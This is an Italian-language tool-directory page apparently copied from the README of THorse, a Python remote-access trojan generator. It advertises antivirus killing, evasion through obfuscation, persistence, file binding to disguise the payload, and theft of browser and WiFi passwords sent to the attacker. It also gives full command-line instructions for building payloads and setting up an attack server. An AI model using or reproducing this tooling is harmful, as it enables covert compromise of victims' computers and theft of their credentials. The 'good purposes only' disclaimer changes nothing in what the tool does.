Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
thorse — THorse è un generatore di RAT (Remote Administrator Trojan) per sistemi Windows/Linux scritto in Python 3. | Kitploit
Strumenti/GitHubGitHub/pushpenderindia/thorse
Password CrackingFramework di ExploitGenerazione di PayloadMeccanismi di PersistenzaEvasione IDS/IPSPost-ExploitCommand and ControlTrojan di Accesso RemotoAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse è un generatore di RAT (Remote Administrator Trojan) per sistemi Windows/Linux scritto in Python 3.

614126643 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

THorse

THorse è un generatore di RAT (Remote Administrator Trojan) per sistemi Windows/Linux scritto in Python 3.

                    Questo piccolo script Python può fare un lavoro davvero fantastico.

Disclaimer

:computer: Questo progetto è stato creato solo per buoni scopi e uso personale.

QUESTO SOFTWARE È FORNITO "COSÌ COM'È" SENZA ALCUNA GARANZIA. PUOI UTILIZZARE QUESTO SOFTWARE A TUO RISCHIO. L'UTILIZZO È DI COMPLETA RESPONSABILITÀ DELL'UTENTE FINALE. GLI SVILUPPATORI NON SI ASSUMONO ALCUNA RESPONSABILITÀ E NON SONO RESPONSABILI DI QUALSIASI USO IMPROPRIO O DANNO CAUSATO DA QUESTO PROGRAMMA.

Caratteristiche

  • Funziona su Windows/Linux
  • Notifica Nuova Vittima Via Email
  • Non rilevabile
  • Non richiede privilegi di root o amministratore
  • Persistenza
  • Invia uno screenshot dello schermo del PC della vittima via email
  • Dà all'attaccante pieno accesso a Meterpreter
  • Non richiede mai l'installazione di Metasploit per creare il trojan
  • Crea un eseguibile binario con zero dipendenze
  • Crea payload di dimensioni ridotte ~ 5mb con funzionalità avanzate
  • Offusca il payload prima di compilarlo, bypassando così qualche antivirus in più
  • Il payload generato è codificato in Base64, rendendo estremamente difficile fare reverse engineering del payload
  • Termina l'antivirus sul PC della vittima e tenta di disabilitare Windows Security Center
  • Interfaccia colorata fantastica per generare payload
  • Lato attaccante: durante la creazione del payload, lo script rileva automaticamente le dipendenze mancanti e le installa
  • In grado di aggiungere un'icona personalizzata al file dannoso
  • Binder integrato che può associare un eseguibile a qualsiasi file [.pdf, .txt, .exe ecc.], eseguendo il file legittimo in primo piano e i codici dannosi in background come servizio.
  • Controlla la presenza di un'istanza già in esecuzione sul sistema; se viene trovata un'istanza in esecuzione, viene eseguito solo il file legittimo [Proibitore di istanze multiple].
  • L'attaccante può creare/compilare per entrambi i sistemi Windows/Linux usando un sistema Linux, ma può creare/compilare solo eseguibili Windows usando una macchina Windows.
  • Recupera le password salvate dal sistema della vittima e le invia all'attaccante.
Recuperi supportati, tenta di recuperare le password salvate da:
Browser Chrome
WiFi

Nota: Lo stealer personalizzato è codificato, non si basa su LaZagne

Testato Su

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Di seguito sono riportati i limiti del payload meterpreter generato con metasploit:-

  • Devi avviare il listener di Metasploit prima di eseguire la backdoor
  • La backdoor non diventa persistente da sola; dobbiamo usare i moduli di post-sfruttamento per rendere la backdoor persistente. E i moduli di post-sfruttamento possono essere usati solo dopo uno sfruttamento riuscito.
  • Non ci avvisa ogni volta che il payload viene eseguito su un nuovo sistema.

Sappiamo tutti quanto sia potente il payload Meterpreter, ma il payload creato da esso non è comunque soddisfacente.

Di seguito sono riportate le funzionalità di questo generatore di payload che ti daranno una buona idea di questo script Python:-

  • Usa il registro di Windows per diventare persistente in Windows.
  • Riesce anche a diventare persistente nei sistemi Linux.
  • Il payload può essere eseguito sia su LINUX che su WINDOWS.
  • Fornisce accesso completo, poiché può essere usato il listener di Metasploit e supporta anche un listener personalizzato (puoi creare il tuo listener).
  • Invia una notifica email quando il payload viene eseguito su un nuovo sistema, con informazioni complete sul sistema.
  • Genera il payload in meno di un minuto o anche meno.
  • Supporta tutti i moduli di post-sfruttamento di Meterpreter.
  • Il payload può essere creato sia su Windows che su Linux.

Prerequisiti

  • Python 3.X
  • Alcuni moduli esterni

Nota importante:

Su Windows, specifica/imposta il percorso di Pyinstaller in paygen.py [Riga 14]

Il percorso predefinito è questo : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Modificalo in base al tuo sistema

Come Usare in Linux

# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Come Usare su VPS (Consigliato)

# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update

# 8. Set Kali Priority
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. Update VPS
$ sudo apt update

# 10. Install Metasploit Framework in VPS
$ sudo apt install -t kali-rolling metasploit-framework
Scarica lo strumento